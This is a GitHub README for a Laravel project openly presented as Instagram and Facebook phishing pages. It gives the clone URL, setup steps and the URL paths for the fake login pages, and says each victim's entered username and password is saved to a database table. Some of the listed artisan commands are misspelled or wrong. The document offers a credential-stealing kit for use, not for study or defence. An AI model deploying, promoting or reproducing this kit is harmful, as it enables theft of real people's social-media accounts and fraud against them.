Skip to content

Latest commit

 

History

History
28 lines (17 loc) · 816 Bytes

README.md

File metadata and controls

28 lines (17 loc) · 816 Bytes

Instagram & Facebook Phishing Pages 2024 (Laravel 10)

Demo: Instagram (Screenshot) image

Demo: Facebook (Screenshot): WIP

How to use?

Just like a notmal way to delpoy laravel project on server

  1. git clone https://github.com/officialzubairansari/social_logins
  2. Create databbase
  3. Update .env with database credentials
  4. Run composer "composer install"
  5. Generate application key "php artisan generate:key"
  6. Run migration "php artisan migrateion:fresh"

Link structure?

  1. For facebook: yourdomain.com/facebook
  2. For Instagram: yourdomain.com/instagram

Where passwords will be saved?

All the username and passwords entered by victim will be store in database for seperate table.